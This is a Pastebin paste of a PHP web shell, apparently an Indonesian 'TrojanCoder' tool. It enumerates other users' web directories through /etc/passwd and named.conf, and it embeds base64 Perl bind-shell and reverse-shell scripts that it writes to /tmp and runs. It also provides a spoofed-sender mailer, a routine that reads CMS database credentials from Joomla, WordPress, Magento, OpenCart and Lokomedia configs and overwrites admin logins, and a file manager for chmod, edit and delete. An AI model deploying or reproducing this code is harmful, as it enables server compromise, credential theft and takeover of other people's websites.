  729.                         $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  730.                         if(is_writable($web_vh)) {
  731.                             $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  732.                         }
  733.                         echo $jrw."<br>";
  734.                     }
  735.                 }
  736.             }
  737.         if($i == 0) {
  738.         } else {
  739.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  740.         }
  741.         echo "</pre>";
  742.         } else {
  743.             echo '<center>
  744.                   <form method="post">
  745.                   List Domains: <br>
  746.                   <textarea name="url" style="width: 500px; height: 250px;">';
  747.                   bing("ip:$ip");
  748.             echo  '</textarea><br>
  749.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  750.                   </form></center>';
  751.         }
  752.     } else {
  753.         echo "<pre>";
  754.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  755.         while($passwd = fgets($etc)) {
  756.             if($passwd == '' || !$etc) {
  757.                 echo "<font color=red>Can't read /etc/passwd</font>";
  758.             } else {
  759.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  760.                 foreach($user_jumping[1] as $myuser_jump) {
  761.                     $user_jumping_dir = "/home/$myuser_jump/public_html";
  762.                     if(is_readable($user_jumping_dir)) {
  763.                         $i++;
  764.                         $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  765.                         if(is_writable($user_jumping_dir)) {
  766.                             $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  767.                         }
  768.                         echo $jrw;
  769.                         if(function_exists('posix_getpwuid')) {
  770.                             $domain_jump = file_get_contents("/etc/named.conf");   
  771.                             if($domain_jump == '') {
  772.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  773.                             } else {
  774.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  775.                                 foreach($domains_jump[1] as $dj) {
  776.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  777.                                     $user_jumping_url = $user_jumping_url['name'];
  778.                                     if($user_jumping_url == $myuser_jump) {
  779.                                         echo " => ( <u>$dj</u> )<br>";
  780.                                         break;
  781.                                     }
  782.                                 }
  783.                             }
  784.                         } else {
  785.                             echo "<br>";
  786.                         }
  787.                     }
  788.                 }
  789.             }
  790.         }
  791.         if($i == 0) {
  792.         } else {
  793.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  794.         }
  795.         echo "</pre>";
  796.     }
  797.     echo "</div>";
  798. }elseif($_GET['x'] == 'network') {
  799.     echo "<form method='post'>
  800.     <u>Bind Port:</u> <br>
  801.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  802.     <input type='submit' name='sub_bp' value='>>'>
  803.     </form>
  804.     <form method='post'>
  805.     <u>Back Connect:</u> <br>
  806.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  807.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  808.     <input type='submit' name='sub_bc' value='>>'>
  809.     </form>";
  810.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  811.     if(isset($_POST['sub_bp'])) {
  812.         $f_bp = fopen("/tmp/bp.pl", "w");
  813.         fwrite($f_bp, base64_decode($bind_port_p));
  814.         fclose($f_bp);
  815.  
  816.         $port = $_POST['port_bind'];
  817.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  818.         sleep(1);
  819.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  820.         unlink("/tmp/bp.pl");
  821.     }
  822.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  823.     if(isset($_POST['sub_bc'])) {
  824.         $f_bc = fopen("/tmp/bc.pl", "w");
  825.         fwrite($f_bc, base64_decode($bind_connect_p));
  826.         fclose($f_bc);
  827.  
  828.         $ipbc = $_POST['ip_bc'];
  829.         $port = $_POST['port_bc'];
  830.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  831.         sleep(1);
  832.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  833.         unlink("/tmp/bc.pl");
  834.     }
  835. }elseif($_GET['x'] == 'jumping') {
  836.     $i = 0;
  837.     echo "<div class='margin: 5px auto;'>";
  838.     if(preg_match("/hsphere/", $dir)) {
  839.         $urls = explode("\r\n", $_POST['url']);
  840.         if(isset($_POST['jump'])) {
  841.             echo "<pre>";
  842.             foreach($urls as $url) {
  843.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  844.                 $etc = "/etc/passwd";
  845.                 $f = fopen($etc,"r");
  846.                 while($gets = fgets($f)) {
  847.                     $pecah = explode(":", $gets);
  848.                     $user = $pecah[0];
  849.                     $dir_user = "/hsphere/local/home/$user";
  850.                     if(is_dir($dir_user) === true) {
  851.                         $url_user = $dir_user."/".$url;
  852.                         if(is_readable($url_user)) {
  853.                             $i++;
  854.                             $jrw = "[<font color=green>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  855.                             if(is_writable($url_user)) {
  856.                                 $jrw = "[<font color=green>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  857.                             }
  858.                             echo $jrw."<br>";
  859.                         }
  860.                     }
  861.                 }
  862.             }
  863.         if($i == 0) {
  864.         } else {
  865.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  866.         }
  867.         echo "</pre>";
  868.         } else {
  869.             echo '<center>
  870.                   <form method="post">
  871.                   List Domains: <br>
  872.                   <textarea name="url" style="width: 500px; height: 250px;">';
  873.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  874.             while($getss = fgets($fp)) {
  875.                 echo $getss;
  876.             }
  877.             echo  '</textarea><br>
  878.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  879.                   </form></center>';
  880.         }
  881.     } elseif(preg_match("/vhosts/", $dir)) {
  882.         $urls = explode("\r\n", $_POST['url']);
  883.         if(isset($_POST['jump'])) {
  884.             echo "<pre>";
  885.             foreach($urls as $url) {
  886.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  887.                 if(is_dir($web_vh) === true) {
  888.                     if(is_readable($web_vh)) {
  889.                         $i++;
  890.                         $jrw = "[<font color=green>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  891.                         if(is_writable($web_vh)) {
  892.                             $jrw = "[<font color=green>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  893.                         }
  894.                         echo $jrw."<br>";
  895.                     }
  896.                 }
  897.             }
  898.         if($i == 0) {
  899.         } else {
  900.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  901.         }
  902.         echo "</pre>";
  903.         } else {
  904.             echo '<center>
  905.                   <form method="post">
  906.                   List Domains: <br>
  907.                   <textarea name="url" style="width: 500px; height: 250px;">';
  908.                   bing("ip:$ip");
  909.             echo  '</textarea><br>
  910.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  911.                   </form></center>';
  912.         }
  913.     } else {
  914.         echo "<pre>";
  915.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  916.         while($passwd = fgets($etc)) {
  917.             if($passwd == '' || !$etc) {
  918.                 echo "<font color=red>Can't read /etc/passwd</font>";
  919.             } else {
  920.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  921.                 foreach($user_jumping[1] as $myuser_jump) {
  922.                     $user_jumping_dir = "/home/$myuser_jump/public_html";
  923.                     if(is_readable($user_jumping_dir)) {
  924.                         $i++;
  925.                         $jrw = "[<font color=green>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  926.                         if(is_writable($user_jumping_dir)) {
  927.                             $jrw = "[<font color=green>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  928.                         }
  929.                         echo $jrw;
  930.                         if(function_exists('posix_getpwuid')) {
  931.                             $domain_jump = file_get_contents("/etc/named.conf");   
  932.                             if($domain_jump == '') {
  933.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  934.                             } else {
  935.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  936.                                 foreach($domains_jump[1] as $dj) {
  937.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  938.                                     $user_jumping_url = $user_jumping_url['name'];
  939.                                     if($user_jumping_url == $myuser_jump) {
  940.                                         echo " => ( <u>$dj</u> )<br>";
  941.                                         break;
  942.                                     }
  943.                                 }
  944.                             }
  945.                         } else {
  946.                             echo "<br>";
  947.                         }
  948.                     }
  949.                 }
  950.             }
  951.         }
  952.         if($i == 0) {
  953.         } else {
  954.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  955.         }
  956.         echo "</pre>";
  957.     }
  958.     echo "</div>";
  959. }elseif($_GET['x'] == 'mail') {
  960. if($_POST['send']) {
  961.   $to = $_POST['to'];
  962.   $from = $_POST['from'];
  963.   $subject = $_POST['subject'];
  964.   $content = sulap($_POST['content']);
  965.   if(@mail($to,$subject,$content,"FROM:$from")) {
  966.     $out = "Mail sent to $to";
  967.   } else {
  968.     $out = "Failed !!";
  969.   }
  970. }
  971.   echo "<h1>Mailer</h1>
  972. <form method='post'>
  973. <textarea name='content' value='Patch your security !' placeholder='Patch your security !'></textarea><br>
  974. Subject :
  975. <input type='text' name='subject' value='Your Website'><br>
  976. To : <input type='text' name='to' value='admin@web.com'><br>From : <input type='text' name='from' value='trojan@sec.gov'><br><input type='submit' name='send' value='Send'><br><br>";
  977. echo $out;
  978. }elseif($_GET['x'] == 'edituser') {
  979.     if($_POST['hajar']) {
  980.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  981.             echo "username atau password harus lebih dari 6 karakter";
  982.         } else {
  983.             $user_baru = $_POST['user_baru'];
  984.             $pass_baru = md5($_POST['pass_baru']);
  985.             $conf = $_POST['config_dir'];
  986.             $scan_conf = scandir($conf);
  987.             foreach($scan_conf as $file_conf) {
  988.                 if(!is_file("$conf/$file_conf")) continue;
  989.                 $config = file_get_contents("$conf/$file_conf");
  990.                 if(preg_match("/JConfig|joomla/",$config)) {
  991.                     $dbhost = ambilkata($config,"host = '","'");
  992.                     $dbuser = ambilkata($config,"user = '","'");
  993.                     $dbpass = ambilkata($config,"password = '","'");
  994.                     $dbname = ambilkata($config,"db = '","'");
  995.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  996.                     $prefix = $dbprefix."users";
  997.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  998.                     $db = mysql_select_db($dbname);
  999.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1000.                     $result = mysql_fetch_array($q);
  1001.                     $id = $result['id'];
  1002.                     $site = ambilkata($config,"sitename = '","'");
  1003.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1004.                     echo "Config => ".$file_conf."<br>";
  1005.                     echo "CMS => Joomla<br>";
  1006.                     if($site == '') {
  1007.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1008.                     } else {
  1009.                         echo "Sitename => $site<br>";
  1010.                     }
  1011.                     if(!$update OR !$conn OR !$db) {
  1012.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1013.                     } else {
  1014.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1015.                     }
  1016.                     mysql_close($conn);
  1017.                 } elseif(preg_match("/WordPress/",$config)) {
  1018.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  1019.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  1020.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1021.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  1022.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  1023.                     $prefix = $dbprefix."users";
  1024.                     $option = $dbprefix."options";
  1025.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1026.                     $db = mysql_select_db($dbname);
  1027.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1028.                     $result = mysql_fetch_array($q);
  1029.                     $id = $result[ID];
  1030.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1031.                     $result2 = mysql_fetch_array($q2);
  1032.                     $target = $result2[option_value];
  1033.                     if($target == '') {
  1034.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1035.                     } else {
  1036.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1037.                     }
  1038.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1039.                     echo "Config => ".$file_conf."<br>";
  1040.                     echo "CMS => Wordpress<br>";
  1041.                     echo $url_target;
  1042.                     if(!$update OR !$conn OR !$db) {
  1043.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1044.                     } else {
  1045.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1046.                     }
  1047.                     mysql_close($conn);
  1048.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1049.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1050.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1051.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1052.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1053.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1054.                     $prefix = $dbprefix."admin_user";
  1055.                     $option = $dbprefix."core_config_data";
  1056.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1057.                     $db = mysql_select_db($dbname);
  1058.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1059.                     $result = mysql_fetch_array($q);
  1060.                     $id = $result[user_id];
  1061.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1062.                     $result2 = mysql_fetch_array($q2);
  1063.                     $target = $result2[value];
  1064.                     if($target == '') {
  1065.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1066.                     } else {
  1067.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1068.                     }
  1069.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1070.                     echo "Config => ".$file_conf."<br>";
  1071.                     echo "CMS => Magento<br>";
  1072.                     echo $url_target;
  1073.                     if(!$update OR !$conn OR !$db) {
  1074.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1075.                     } else {
  1076.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1077.                     }
  1078.                     mysql_close($conn);
  1079.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1080.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1081.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1082.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1083.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1084.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1085.                     $prefix = $dbprefix."user";
  1086.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1087.                     $db = mysql_select_db($dbname);
  1088.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1089.                     $result = mysql_fetch_array($q);
  1090.                     $id = $result[user_id];
  1091.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  1092.                     if($target == '') {
  1093.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1094.                     } else {
  1095.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1096.                     }
  1097.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1098.                     echo "Config => ".$file_conf."<br>";
  1099.                     echo "CMS => OpenCart<br>";
  1100.                     echo $url_target;
  1101.                     if(!$update OR !$conn OR !$db) {
  1102.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1103.                     } else {
  1104.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1105.                     }
  1106.                     mysql_close($conn);
  1107.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1108.                     $dbhost = ambilkata($config,'server = "','"');
  1109.                     $dbuser = ambilkata($config,'username = "','"');
  1110.                     $dbpass = ambilkata($config,'password = "','"');
  1111.                     $dbname = ambilkata($config,'database = "','"');
  1112.                     $prefix = "users";
  1113.                     $option = "identitas";
  1114.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1115.                     $db = mysql_select_db($dbname);
  1116.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1117.                     $result = mysql_fetch_array($q);
  1118.                     $target = $result[alamat_website];
  1119.                     if($target == '') {
  1120.                         $target2 = $result[url];
  1121.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1122.                         if($target2 == '') {
  1123.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1124.                         } else {
  1125.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  1126.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1127.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1128.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1129.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1130.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1131.                             } else {
  1132.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1133.                             }
  1134.                         }
  1135.                     } else {
  1136.                         $cek_login = file_get_contents("$target/adminweb/");
  1137.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1138.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1139.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1140.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1141.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1142.                         } else {
  1143.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1144.                         }
  1145.                     }
  1146.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1147.                     echo "Config => ".$file_conf."<br>";
  1148.                     echo "CMS => Lokomedia<br>";
  1149.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1150.                         echo $url_target2;
  1151.                     } else {
  1152.                         echo $url_target;
  1153.                     }
  1154.                     if(!$update OR !$conn OR !$db) {
  1155.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1156.                     } else {
  1157.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1158.                     }
  1159.                     mysql_close($conn);
  1160.                 }
  1161.             }
  1162.         }
  1163.     } else {
  1164.         echo "<center>
  1165.         <h1>Auto Edit User Config</h1>
  1166.         <form method='post'>
  1167.         DIR Config: <br>
  1168.         <input type='text' size='50' name='config_dir' value='$path'><br><br>
  1169.         Set User & Pass: <br>
  1170.         <input type='text' name='user_baru' value='trojan' placeholder='user_baru'><br>
  1171.         <input type='text' name='pass_baru' value='trojan' placeholder='pass_baru'><br>
  1172.         <input type='submit' name='hajar' value='Edit' style='width: 215px;'>
  1173.         </form>";
  1174.     }
  1175. }elseif(isset($_GET['filesrc'])){
  1176. echo "<tr><td>Current File : ";
  1177. echo $_GET['filesrc'];
  1178. echo '</tr></td></table><br/>';
  1179. echo('<textarea cols="80" rows="20" readonly>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  1180. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  1181. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  1182. if($_POST['opt'] == 'chmod'){
  1183. if(isset($_POST['perm'])){
  1184. if(chmod($_POST['path'],$_POST['perm'])){
  1185. echo '<font color="green">Success !</font><br/>';
  1186. }else{
  1187. echo '<font color="red">Denied !</font><br />';
  1188. }
  1189. }
  1190. echo '<form method="POST">
  1191. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  1192. <input type="hidden" name="path" value="'.$_POST['path'].'">
  1193. <input type="hidden" name="opt" value="chmod">
  1194. <input type="submit" value="Go" />
  1195. </form>';
  1196. }
  1197. elseif($_POST['opt'] == 'rename'){
  1198. if(isset($_POST['newname'])){
  1199. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  1200. echo '<font color="green">Success !</font><br/>';
  1201. }else{
  1202. echo '<font color="red">Denied !</font><br />';
  1203. }
  1204. $_POST['name'] = $_POST['newname'];
  1205. }
  1206. echo '<form method="POST">
  1207. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  1208. <input type="hidden" name="path" value="'.$_POST['path'].'">
  1209. <input type="hidden" name="opt" value="rename">
  1210. <input type="submit" value="Go" />
  1211. </form>';
  1212. }elseif($_POST['opt'] == 'edit'){
  1213. if(isset($_POST['src'])){
  1214. $fp = fopen($_POST['path'],'w');
  1215. if(fwrite($fp,$_POST['src'])){
  1216. echo '<font color="green">Success !</font><br/>';
  1217. }else{
  1218. echo '<font color="red">Denied !</font><br/>';
  1219. }
  1220. fclose($fp);
  1221. }
  1222. echo '<form method="POST">
  1223. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  1224. <input type="hidden" name="path" value="'.$_POST['path'].'">
  1225. <input type="hidden" name="opt" value="edit">
  1226. <input type="submit" value="Save" />
  1227. </form>';
  1228. }
  1229. echo '</center>';
  1230. }else{
  1231. echo '</table><br/><center>';
  1232. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  1233. if($_POST['type'] == 'dir'){
  1234. if(rmdir($_POST['path'])){
  1235. echo '<font color="green">Success !</font><br/>';
  1236. }else{
  1237. echo '<font color="red">Denied !                                                                                                             </font><br/>';
  1238. }
  1239. }elseif($_POST['type'] == 'file'){
  1240. if(unlink($_POST['path'])){
  1241. echo '<font color="green">Success</font><br/>';
  1242. }else{
  1243. echo '<font color="red">Denied</font><br/>';
  1244. }
  1245. }
  1246. }
  1247. echo '</center>';
  1248. $scandir = scandir($path);
  1249. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  1250. <tr class="first">
  1251. <td><center>Name</center></td>
  1252. <td><center>Size</center></td>
  1253. <td><center>Permission</center></td>
  1254. <td><center>Action</center></td>
  1255. </tr>';
  1256.  
  1257. foreach($scandir as $dir){
  1258. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  1259. echo '<tr>
  1260. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  1261. <td><center>--</center></td>
  1262. <td><center>';
  1263. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  1264. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  1265. echo perms($path.'/'.$dir);
  1266. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  1267.  
  1268. echo '</center></td>
  1269. <td><center><form method="POST" action="?option&path='.$path.'">
  1270. <select name="opt">
  1271. <option value="">Select</option>
  1272. <option value="delete">Delete</option>
  1273. <option value="chmod">Chmod</option>
  1274. <option value="rename">Rename</option>
  1275. </select>
  1276. <input type="hidden" name="type" value="dir">
  1277. <input type="hidden" name="name" value="'.$dir.'">
  1278. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  1279. <input type="submit" value=">">
  1280. </form></center></td>
  1281. </tr>';
  1282. }
  1283. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  1284. foreach($scandir as $file){
  1285. if(!is_file($path.'/'.$file)) continue;
  1286. $size = filesize($path.'/'.$file)/1024;
  1287. $size = round($size,3);
  1288. if($size >= 1024){
  1289. $size = round($size/1024,2).' MB';
  1290. }else{
  1291. $size = $size.' KB';
  1292. }
  1293.  
  1294. echo '<tr>
  1295. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  1296. <td><center>'.$size.'</center></td>
  1297. <td><center>';
  1298. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  1299. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  1300. echo perms($path.'/'.$file);
  1301. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  1302. echo '</center></td>
  1303. <td><center><form method="POST" action="?option&path='.$path.'">
  1304. <select name="opt">
  1305. <option value="">Select</option>
  1306. <option value="delete">Delete</option>
  1307. <option value="chmod">Chmod</option>
  1308. <option value="rename">Rename</option>
  1309. <option value="edit">Edit</option>
  1310. </select>
  1311. <input type="hidden" name="type" value="file">
  1312. <input type="hidden" name="name" value="'.$file.'">
  1313. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  1314. <input type="submit" value=">">
  1315. </form></center></td>
  1316. </tr>';
  1317. }
  1318. echo '</table>
  1319. </div>';
  1320. }
  1321. echo '<center><br/>Copyright &copy '.date("Y").' <a href="https://www.facebook.com/h34rtz" target="_blank">TrojanCoder</a> - <a href="https://www.facebook.com/1ntr0ver7.Tersakiti" target="_blank">'.$_COPY.'</a></center>
  1322. </body>
  1323. </html>';
  1324. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top